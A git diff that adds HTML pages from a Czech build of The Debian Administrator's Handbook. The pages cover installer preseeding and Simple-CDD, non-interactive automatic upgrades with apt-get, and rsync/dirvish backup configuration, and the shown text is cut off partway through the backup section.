+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							on the boot media (CD or USB key); preseeding then happens as soon as the media is mounted, which means right after the questions about language and keyboard layout. The <code
+                      class="literal">preseed/file</code> boot parameter can be used to indicate the location of the preseeding file (for instance, <code
+                      class="filename">/cdrom/preseed.cfg</code> when the installation is done off a CD-ROM, or <code
+                      class="filename">/hd-media/preseed.cfg</code> in the USB-key case).
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							from the network; preseeding then only happens after the network is (automatically) configured; the relevant boot parameter is then <code
+                      class="literal">preseed/url=http://<em
+                        class="replaceable">server</em>/preseed.cfg</code>.
+						</div></li></ul></div><div
+              class="para">
+					At a glance, including the preseeding file in the initrd looks like the most interesting solution; however, it is rarely used in practice, because generating an installer initrd is rather complex. The other two solutions are much more common, especially since boot parameters provide another way to preseed the answers to the first questions of the installation process. The usual way to save the bother of typing these boot parameters by hand at each installation is to save them into the configuration for <code
+                class="command">isolinux</code> (in the CD-ROM case) or <code
+                class="command">syslinux</code> (USB key).
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.6.10.7"></a>12.3.2.2. Creating a Preseed File</h4></div></div></div><div
+              class="para">
+					A preseed file is a plain text file, where each line contains the answer to one Debconf question. A line is split across four fields separated by whitespace (spaces or tabs), as in, for instance, <code
+                class="literal">d-i mirror/suite string stable</code>:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							the first field is the “owner” of the question; “d-i” is used for questions relevant to the installer, but it can also be a package name for questions coming from Debian packages;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							the second field is an identifier for the question;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							third, the type of question;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							the fourth and last field contains the value for the answer. Note that it must be separated from the third field with a single space; if there are more than one, the following space characters are considered part of the value.
+						</div></li></ul></div><div
+              class="para">
+					The simplest way to write a preseed file is to install a system by hand. Then <code
+                class="command">debconf-get-selections --installer</code> will provide the answers concerning the installer. Answers about other packages can be obtained with <code
+                class="command">debconf-get-selections</code>. However, a cleaner solution is to write the preseed file by hand, starting from an example and the reference documentation: with such an approach, only questions where the default answer needs to be overridden can be preseeded; using the <code
+                class="literal">priority=critical</code> boot parameter will instruct Debconf to only ask critical questions, and use the default answer for others.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>DOCUMENTATION</em></span> Installation guide appendix</strong></p></div></div></div><div
+                class="para">
+					The installation guide, available online, includes detailed documentation on the use of a preseed file in an appendix. It also includes a detailed and commented sample file, which can serve as a base for local customizations. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://www.debian.org/releases/jessie/amd64/apb.html">https://www.debian.org/releases/jessie/amd64/apb.html</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://www.debian.org/releases/jessie/example-preseed.txt">https://www.debian.org/releases/jessie/example-preseed.txt</a></div>
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.6.10.8"></a>12.3.2.3. Creating a Customized Boot Media</h4></div></div></div><div
+              class="para">
+					Knowing where to store the preseed file is all very well, but the location isn't everything: one must, one way or another, alter the installation boot media to change the boot parameters and add the preseed file.
+				</div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.15.6.10.8.3"></a>12.3.2.3.1. Booting From the Network</h5></div></div></div><div
+                class="para">
+						When a computer is booted from the network, the server sending the initialization elements also defines the boot parameters. Thus, the change needs to be made in the PXE configuration for the boot server; more specifically, in its <code
+                  class="filename">/tftpboot/pxelinux.cfg/default</code> configuration file. Setting up network boot is a prerequisite; see the Installation Guide for details. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://www.debian.org/releases/jessie/amd64/ch04s05.html">https://www.debian.org/releases/jessie/amd64/ch04s05.html</a></div>
+					</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.15.6.10.8.4"></a>12.3.2.3.2. Preparing a Bootable USB Key</h5></div></div></div><div
+                class="para">
+						Once a bootable key has been prepared (see <a
+                  class="xref"
+                  href="installation.html#sect.install-usb">4.1.2 – „Booting from a USB Key“</a>), a few extra operations are needed. Assuming the key contents are available under <code
+                  class="filename">/media/usbdisk/</code>:
+					</div><div
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="itemizedlist"><ul><li
+                    class="listitem"><div
+                      class="para">
+								copy the preseed file to <code
+                        class="filename">/media/usbdisk/preseed.cfg</code>
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								edit <code
+                        class="filename">/media/usbdisk/syslinux.cfg</code> and add required boot parameters (see example below).
+							</div></li></ul></div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.15.6.10.8.4.4"></a><p
+                  class="title"><strong>Příklad 12.2. syslinux.cfg file and preseeding parameters</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">default vmlinuz
+append preseed/file=/hd-media/preseed.cfg locale=en_US.UTF-8 keymap=us language=us country=US vga=788 initrd=initrd.gz  --
+</pre></div></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.15.6.10.8.5"></a>12.3.2.3.3. Creating a CD-ROM Image</h5></div></div></div><a
+                id="id-1.15.6.10.8.5.2"
+                class="indexterm"></a><div
+                class="para">
+						A USB key is a read-write media, so it was easy for us to add a file there and change a few parameters. In the CD-ROM case, the operation is more complex, since we need to regenerate a full ISO image. This task is handled by <span
+                  class="pkg pkg">debian-cd</span>, but this tool is rather awkward to use: it needs a local mirror, and it requires an understanding of all the options provided by <code
+                  class="filename">/usr/share/debian-cd/CONF.sh</code>; even then, <code
+                  class="command">make</code> must be invoked several times. <code
+                  class="filename">/usr/share/debian-cd/README</code> is therefore a very recommended read.
+					</div><div
+                class="para">
+						Having said that, debian-cd always operates in a similar way: an “image” directory with the exact contents of the CD-ROM is generated, then converted to an ISO file with a tool such as <code
+                  class="command">genisoimage</code>, <code
+                  class="command">mkisofs</code> or <code
+                  class="command">xorriso</code>. The image directory is finalized after debian-cd's <code
+                  class="command">make image-trees</code> step. At that point, we insert the preseed file into the appropriate directory (usually <code
+                  class="filename">$TDIR/$CODENAME/CD1/</code>, $TDIR and $CODENAME being parameters defined by the <code
+                  class="filename">CONF.sh</code> configuration file). The CD-ROM uses <code
+                  class="command">isolinux</code> as its bootloader, and its configuration file must be adapted from what debian-cd generated, in order to insert the required boot parameters (the specific file is <code
+                  class="filename">$TDIR/$CODENAME/boot1/isolinux/isolinux.cfg</code>). Then the “normal” process can be resumed, and we can go on to generating the ISO image with <code
+                  class="command">make image CD=1</code> (or <code
+                  class="command">make images</code> if several CD-ROMs are generated).
+					</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.simple-cdd"></a>12.3.3. Simple-CDD: The All-In-One Solution</h3></div></div></div><a
+            id="id-1.15.6.11.2"
+            class="indexterm"></a><div
+            class="para">
+				Simply using a preseed file is not enough to fulfill all the requirements that may appear for large deployments. Even though it is possible to execute a few scripts at the end of the normal installation process, the selection of the set of packages to install is still not quite flexible (basically, only “tasks” can be selected); more important, this only allows installing official Debian packages, and precludes locally-generated ones.
+			</div><div
+            class="para">
+				On the other hand, debian-cd is able to integrate external packages, and debian-installer can be extended by inserting new steps in the installation process. By combining these capabilities, it should be possible to create a customized installer that fulfills our needs; it should even be able to configure some services after unpacking the required packages. Fortunately, this is not a mere hypothesis, since this is exactly what Simple-CDD (in the <span
+              class="pkg pkg">simple-cdd</span> package) does.
+			</div><div
+            class="para">
+				The purpose of Simple-CDD is to allow anyone to easily create a distribution derived from Debian, by selecting a subset of the available packages, preconfiguring them with Debconf, adding specific software, and executing custom scripts at the end of the installation process. This matches the “universal operating system” philosophy, since anyone can adapt it to their own needs.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.6.11.6"></a>12.3.3.1. Creating Profiles</h4></div></div></div><div
+              class="para">
+					Simple-CDD defines “profiles” that match the FAI “classes” concept, and a machine can have several profiles (determined at installation time). A profile is defined by a set of <code
+                class="filename">profiles/<em
+                  class="replaceable">profile</em>.*</code> files:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							the <code
+                      class="filename">.description</code> file contains a one-line description for the profile;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							the <code
+                      class="filename">.packages</code> file lists packages that will automatically be installed if the profile is selected;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							the <code
+                      class="filename">.downloads</code> file lists packages that will be stored onto the installation media, but not necessarily installed;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							the <code
+                      class="filename">.preseed</code> file contains preseeding information for Debconf questions (for the installer and/or for packages);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							the <code
+                      class="filename">.postinst</code> file contains a script that will be run at the end of the installation process;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							lastly, the <code
+                      class="filename">.conf</code> file allows changing some Simple-CDD parameters based on the profiles to be included in an image.
+						</div></li></ul></div><div
+              class="para">
+					The <code
+                class="literal">default</code> profile has a particular role, since it is always selected; it contains the bare minimum required for Simple-CDD to work. The only thing that is usually customized in this profile is the <code
+                class="literal">simple-cdd/profiles</code> preseed parameter: this allows avoiding the question, introduced by Simple-CDD, about what profiles to install.
+				</div><div
+              class="para">
+					Note also that the commands will need to be invoked from the parent directory of the <code
+                class="filename">profiles</code> directory.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.6.11.7"></a>12.3.3.2. Configuring and Using <code
+                      class="command">build-simple-cdd</code></h4></div></div></div><a
+              id="id-1.15.6.11.7.2"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>QUICK LOOK</em></span> Detailed configuration file</strong></p></div></div></div><div
+                class="para">
+					An example of a Simple-CDD configuration file, with all possible parameters, is included in the package (<code
+                  class="filename">/usr/share/doc/simple-cdd/examples/simple-cdd.conf.detailed.gz</code>). This can be used as a starting point when creating a custom configuration file.
+				</div></div><div
+              class="para">
+					Simple-CDD requires many parameters to operate fully. They will most often be gathered in a configuration file, which <code
+                class="command">build-simple-cdd</code> can be pointed at with the <code
+                class="literal">--conf</code> option, but they can also be specified via dedicated parameters given to <code
+                class="command">build-simple-cdd</code>. Here is an overview of how this command behaves, and how its parameters are used:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							the <code
+                      class="literal">profiles</code> parameter lists the profiles that will be included on the generated CD-ROM image;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							based on the list of required packages, Simple-CDD downloads the appropriate files from the server mentioned in <code
+                      class="literal">server</code>, and gathers them into a partial mirror (which will later be given to debian-cd);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							the custom packages mentioned in <code
+                      class="literal">local_packages</code> are also integrated into this local mirror;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							debian-cd is then executed (within a default location that can be configured with the <code
+                      class="literal">debian_cd_dir</code> variable), with the list of packages to integrate;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							once debian-cd has prepared its directory, Simple-CDD applies some changes to this directory:
+						</div><div
+                    class="itemizedlist"><ul><li
+                        class="listitem"><div
+                          class="para">
+									files containing the profiles are added in a <code
+                            class="filename">simple-cdd</code> subdirectory (that will end up on the CD-ROM);
+								</div></li><li
+                        class="listitem"><div
+                          class="para">
+									other files listed in the <code
+                            class="literal">all_extras</code> parameter are also added;
+								</div></li><li
+                        class="listitem"><div
+                          class="para">
+									the boot parameters are adjusted so as to enable the preseeding. Questions concerning language and country can be avoided if the required information is stored in the <code
+                            class="literal">language</code> and <code
+                            class="literal">country</code> variables.
+								</div></li></ul></div></li><li
+                  class="listitem"><div
+                    class="para">
+							debian-cd then generates the final ISO image.
+						</div></li></ul></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.6.11.8"></a>12.3.3.3. Generating an ISO Image</h4></div></div></div><div
+              class="para">
+					Once we have written a configuration file and defined our profiles, the remaining step is to invoke <code
+                class="command">build-simple-cdd --conf simple-cdd.conf</code>. After a few minutes, we get the required image in <code
+                class="filename">images/debian-8.0-amd64-CD-1.iso</code>.
+				</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.virtualization.html"><strong>Předcházející</strong>12.2. Virtualization</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.monitoring.html"><strong>Další</strong>12.4. Monitoring</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.automatic-upgrades.html b/tmp/cs-CZ/html/sect.automatic-upgrades.html
new file mode 100644
index 000000000..adfe3af3c
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.automatic-upgrades.html
@@ -0,0 +1,187 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.8. Automatic Upgrades</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="sect.regular-upgrades.html"
+        title="6.7. Keeping a System Up to Date" /><link
+        rel="next"
+        href="sect.searching-packages.html"
+        title="6.9. Searching for Packages" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.automatic-upgrades.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.regular-upgrades.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.searching-packages.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.automatic-upgrades"></a>6.8. Automatic Upgrades</h2></div></div></div><a
+          id="id-1.9.17.2"
+          class="indexterm"></a><a
+          id="id-1.9.17.3"
+          class="indexterm"></a><div
+          class="para">
+			Since Falcot Corp has many computers but only limited manpower, its administrators try to make upgrades as automatic as possible. The programs in charge of these processes must therefore run with no human intervention.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.17.5"></a>6.8.1. Configuring <code
+                    class="command">dpkg</code></h3></div></div></div><div
+            class="para">
+				As we have already mentioned (see sidebar <a
+              class="xref"
+              href="sect.package-meta-information.html#sidebar.questions-conffiles"><span
+                class="emphasis"><em>GOING FURTHER</em></span> Avoiding the configuration file questions</a>), <code
+              class="command">dpkg</code> can be instructed not to ask for confirmation when replacing a configuration file (with the <code
+              class="literal">--force-confdef --force-confold</code> options). Interactions can, however, have three other sources: some come from APT itself, some are handled by <code
+              class="command">debconf</code>, and some happen on the command line due to package configuration scripts.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.17.6"></a>6.8.2. Configuring APT</h3></div></div></div><div
+            class="para">
+				The case of APT is simple: the <code
+              class="literal">-y</code> option (or <code
+              class="literal">--assume-yes</code>) tells APT to consider the answer to all its questions to be “yes”.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.17.7"></a>6.8.3. Configuring <code
+                    class="command">debconf</code></h3></div></div></div><div
+            class="para">
+				The case of <code
+              class="command">debconf</code> deserves more details. This program was, from its inception, designed to control the relevance and volume of questions displayed to the user, as well as the way they are shown. That is why its configuration requests a minimal priority for questions; only questions above the minimal priority are displayed. <code
+              class="command">debconf</code> assumes the default answer (defined by the package maintainer) for questions which it decided to skip.
+			</div><div
+            class="para">
+				The other relevant configuration element is the interface used by the front-end. If you choose <code
+              class="literal">noninteractive</code> out of the choices, all user interaction is disabled. If a package tries to display an informative note, it will be sent to the administrator by email.
+			</div><div
+            class="para">
+				To reconfigure <code
+              class="command">debconf</code>, use the <code
+              class="command">dpkg-reconfigure</code> tool from the <span
+              class="pkg pkg">debconf</span> package; the relevant command is <code
+              class="command">dpkg-reconfigure debconf</code>. Note that the configured values can be temporarily overridden with environment variables when needed (for instance, <code
+              class="varname">DEBIAN_FRONTEND</code> controls the interface, as documented in the <span
+              class="citerefentry"><span
+                class="refentrytitle">debconf</span>(7)</span> manual page).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.17.8"></a>6.8.4. Handling Command Line Interactions</h3></div></div></div><div
+            class="para">
+				The last source of interactions, and the hardest to get rid of, is the configuration scripts run by <code
+              class="command">dpkg</code>. There is unfortunately no standard solution, and no answer is overwhelmingly better than another.
+			</div><div
+            class="para">
+				The common approach is to suppress the standard input by redirecting the empty content of <code
+              class="filename">/dev/null</code> into it with <code
+              class="command"><em
+                class="replaceable">command</em> &lt;/dev/null</code>, or to feed it with an endless stream of newlines. None of these methods is 100 % reliable, but they generally lead to the default answers being used, since most scripts consider a lack of reply as an acceptance of the default value.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.17.9"></a>6.8.5. The Miracle Combination</h3></div></div></div><div
+            class="para">
+				By combining the previous elements, it is possible to design a small but rather reliable script which can handle automatic upgrades.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.non-interactive-upgrade"></a><p
+              class="title"><strong>Příklad 6.4. Non-interactive upgrade script</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">export DEBIAN_FRONTEND=noninteractive
+yes '' | apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" dist-upgrade
+</pre></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> The Falcot Corp case</strong></p></div></div></div><div
+              class="para">
+				Falcot computers are a heterogeneous system, with machines having various functions. Administrators will therefore pick the most relevant solution for each computer.
+			</div><div
+              class="para">
+				In practice, the servers running <span
+                class="distribution distribution">Stretch</span> are configured with the “miracle combination” above, and are kept up to date automatically. Only the most critical servers (the firewalls, for instances) are set up with <code
+                class="command">apticron</code>, so that upgrades always happen under the supervision of an administrator.
+			</div><div
+              class="para">
+				The office workstations in the administrative services also run <span
+                class="distribution distribution">Stretch</span>, but they are equipped with <span
+                class="pkg pkg">gnome-packagekit</span>, so that users trigger the upgrades themselves. The rationale for this decision is that if upgrades happen without an explicit action, the behavior of the computer might change unexpectedly, which could cause confusion for the main users.
+			</div><div
+              class="para">
+				In the lab, the few computers using <span
+                class="distribution distribution">Testing</span> — to take advantage of the latest software versions — are not upgraded automatically either. Administrators only configure APT to prepare the upgrades but not enact them; when they decide to upgrade (manually), the tedious parts of refreshing package lists and downloading packages will be avoided, and administrators can focus on the really useful part.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.regular-upgrades.html"><strong>Předcházející</strong>6.7. Keeping a System Up to Date</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.searching-packages.html"><strong>Další</strong>6.9. Searching for Packages</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.backup.html b/tmp/cs-CZ/html/sect.backup.html
new file mode 100644
index 000000000..5860da679
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.backup.html
@@ -0,0 +1,297 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.10. Backup</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.quotas.html"
+        title="9.9. Quotas" /><link
+        rel="next"
+        href="sect.hotplug.html"
+        title="9.11. Hot Plugging: hotplug" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.backup.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.quotas.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.hotplug.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.backup"></a>9.10. Backup</h2></div></div></div><div
+          class="para">
+			Making backups is one of the main responsibilities of any administrator, but it is a complex subject, involving powerful tools which are often difficult to master.
+		</div><a
+          id="id-1.12.13.3"
+          class="indexterm"></a><a
+          id="id-1.12.13.4"
+          class="indexterm"></a><div
+          class="para">
+			Many programs exist, such as <code
+            class="command">amanda</code>, <code
+            class="command">bacula</code>, <code
+            class="command">BackupPC</code>. Those are client/server system featuring many options, whose configuration is rather difficult. Some of them provide user-friendly web interfaces to mitigate this. But Debian contains dozens of other backup software covering all possible use cases, as you can easily confirm with <code
+            class="command">apt-cache search backup</code>.
+		</div><a
+          id="id-1.12.13.6"
+          class="indexterm"></a><a
+          id="id-1.12.13.7"
+          class="indexterm"></a><a
+          id="id-1.12.13.8"
+          class="indexterm"></a><div
+          class="para">
+			Rather than detailing some of them, this section will present the thoughts of the Falcot Corp administrators when they defined their backup strategy.
+		</div><div
+          class="para">
+			At Falcot Corp, backups have two goals: recovering erroneously deleted files, and quickly restoring any computer (server or desktop) whose hard drive has failed.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.12.13.11"></a>9.10.1. Backing Up with <code
+                    class="command">rsync</code></h3></div></div></div><div
+            class="para">
+				Backups on tape having been deemed too slow and costly, data will be backed up on hard drives on a dedicated server, on which the use of software RAID (see <a
+              class="xref"
+              href="advanced-administration.html#sect.raid-soft">12.1.1 – „Software RAID“</a>) will protect the data from hard drive failure. Desktop computers are not backed up individually, but users are advised that their personal account on their department's file server will be backed up. The <code
+              class="command">rsync</code> command (from the package of the same name) is used daily to back up these different servers.
+			</div><a
+            id="id-1.12.13.11.3"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> The hard link, a second name for the file</strong></p></div></div></div><a
+              id="id-1.12.13.11.4.2"
+              class="indexterm"></a><a
+              id="id-1.12.13.11.4.3"
+              class="indexterm"></a><div
+              class="para">
+				A hard link, as opposed to a symbolic link, cannot be differentiated from the linked file. Creating a hard link is essentially the same as giving an existing file a second name. This is why the deletion of a hard link only removes one of the names associated with the file. As long as another name is still assigned to the file, the data therein remain present on the filesystem. It is interesting to note that, unlike a copy, the hard link does not take up additional space on the hard drive.
+			</div><div
+              class="para">
+				A hard link is created with the <code
+                class="command">ln <em
+                  class="replaceable">target</em> <em
+                  class="replaceable">link</em></code> command. The <em
+                class="replaceable">link</em> file is then a new name for the <em
+                class="replaceable">target</em> file. Hard links can only be created on the same filesystem, while symbolic links are not subject to this limitation.
+			</div></div><div
+            class="para">
+				The available hard drive space prohibits implementation of a complete daily backup. As such, the <code
+              class="command">rsync</code> command is preceded by a duplication of the content of the previous backup with hard links, which prevents usage of too much hard drive space. The <code
+              class="command">rsync</code> process then only replaces files that have been modified since the last backup. With this mechanism a great number of backups can be kept in a small amount of space. Since all backups are immediately available and accessible (for example, in different directories of a given share on the network), you can quickly make comparisons between two given dates.
+			</div><a
+            id="id-1.12.13.11.6"
+            class="indexterm"></a><a
+            id="id-1.12.13.11.7"
+            class="indexterm"></a><a
+            id="id-1.12.13.11.8"
+            class="indexterm"></a><div
+            class="para">
+				This backup mechanism is easily implemented with the <code
+              class="command">dirvish</code> program. It uses a backup storage space (“bank” in its vocabulary) in which it places timestamped copies of sets of backup files (these sets are called “vaults” in the dirvish documentation).
+			</div><div
+            class="para">
+				The main configuration is in the <code
+              class="filename">/etc/dirvish/master.conf</code> file. It defines the location of the backup storage space, the list of “vaults” to manage, and default values for expiration of the backups. The rest of the configuration is located in the <code
+              class="filename"><em
+                class="replaceable">bank</em>/<em
+                class="replaceable">vault</em>/dirvish/default.conf</code> files and contains the specific configuration for the corresponding set of files.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.dirvish-master"></a><p
+              class="title"><strong>Příklad 9.3. The <code
+                  class="filename">/etc/dirvish/master.conf</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">bank:
+    /backup
+exclude:
+    lost+found/
+    core
+    *~
+Runall:
+    root    22:00
+expire-default: +15 days
+expire-rule:
+#   MIN HR    DOM MON       DOW  STRFTIME_FMT
+    *   *     *   *         1    +3 months
+    *   *     1-7 *         1    +1 year
+    *   *     1-7 1,4,7,10  1
+</pre></div></div><div
+            class="para">
+				The <code
+              class="literal">bank</code> setting indicates the directory in which the backups are stored. The <code
+              class="literal">exclude</code> setting allows you to indicate files (or file types) to exclude from the backup. The <code
+              class="literal">Runall</code> is a list of file sets to backup with a time-stamp for each set, which allows you to assign the correct date to the copy, in case the backup is not triggered at precisely the assigned time. You have to indicate a time just before the actual execution time (which is, by default, 10:04 pm in Debian, according to <code
+              class="filename">/etc/cron.d/dirvish</code>). Finally, the <code
+              class="literal">expire-default</code> and <code
+              class="literal">expire-rule</code> settings define the expiration policy for backups. The above example keeps forever backups that are generated on the first Sunday of each quarter, deletes after one year those from the first Sunday of each month, and after 3 months those from other Sundays. Other daily backups are kept for 15 days. The order of the rules does matter, Dirvish uses the last matching rule, or the <code
+              class="literal">expire-default</code> one if no other <code
+              class="literal">expire-rule</code> matches.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Scheduled expiration</strong></p></div></div></div><div
+              class="para">
+				The expiration rules are not used by <code
